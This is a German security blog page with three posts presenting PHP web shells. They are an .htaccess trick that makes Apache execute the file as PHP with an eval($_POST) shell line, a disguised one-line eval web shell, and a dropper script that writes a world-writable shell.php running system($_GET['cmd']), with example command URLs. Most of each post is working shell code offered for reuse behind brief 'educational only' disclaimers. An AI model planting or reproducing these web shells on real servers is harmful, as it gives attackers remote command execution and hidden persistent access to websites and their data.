BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

1Jun/110

PHP-Shell in .htaccess Datei

Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers.

Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.

Beispiel .htaccess:

# Orginal von http://www.justanotherhacker.com 
# umgeschrieben von http://blog.botnetzprovider.de 

Order allow,deny
Allow from all

# Apache sagen bitte die .htaccess Datei als PHP interpretieren. 
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
9Feb/102

Micro PHP Shell – Stand-Alone

Hier möchte ich kurz mal eine neue PHP-Shell euch vorstellen. Es handelt sich dabei um eine "Stand-Alone" PHP Shell, die sich auch noch in gewisser maßen "tarnt".

test<?php @eval($_POST[code]);?>

Bei einem direkten Aufruf bekommt man ein "test" zurück. Man könnte hier auch einfachen eigenen HTML Code mitgeben. Die Shell wird ganz normal aufgerufen mit folgendem Befehl:
http://www.deine-webseite-und-nur-deine.de/shell.php?code=[foo]

Wir immer aus der Reihe der Micro PHP Shells möchte ich euch darauf hinweisen, dass ihr die Shells nur zu edukativen Zwecken verwenden werden dürfen.

veröffentlicht unter: PHP-Shell 2 Kommentare
2Feb/100

Micro PHP Shell

Dies wird eine ganz neue Kategorie, über die ich gerne schreiben würde: "Micro PHP Shells".

Allen sollten die "großen" PHP Shells wie: c99,r57, etc kennen. Doch was ich an diesen Shells nicht mag ist, dass die zu voll gepackt sind mit allem was man nicht wirklich braucht.

Ich möchte euch heute meine eigene kleine "micro PHP Shell" vorstellen.

<?php
$File = "shell.php";
$Handle = fopen($File, 'w');
$Data = '<?php system($_GET["cmd"]); ?>';
fwrite($Handle, $Data);
print "online";
fclose($Handle);
`chmod -R a+w $File`;
`chmod 777 $File`;
?>

Diese Shell ermöglicht es uns einen Datei mit dem Namen "shell.php" abzulegen. Da wir zuvor diese Datei mit einer macro Shell eingebunden haben () können wir die Shell nun wie folgt aufrufen:

www.deine-domain.info/pfad/shell.php?cmd?=$command

Nun können wir anstatt $command einfache Shell basierende Befehle aufrufen und diese werden direkt ausgeführt.

z.B.: www.deine-domain.info/pfad/shell.php?cmd?=ls

Nun bekommt man die Dateien in diesem Ordner angezeigt:

foo.php index.php shell.php

**** Warnung
Diese Shell sollte niemals ohne einen Schutz auf dem eigenen Webspace abgelegt werden, da jeder diese Befehle ausführen kann und es zu Datenverlust kommen kann. Dies ist nur ein theoretisches Beispiel für einen PHP-Shell.

veröffentlicht unter: PHP-Shell keine Kommentare
/* google like button API */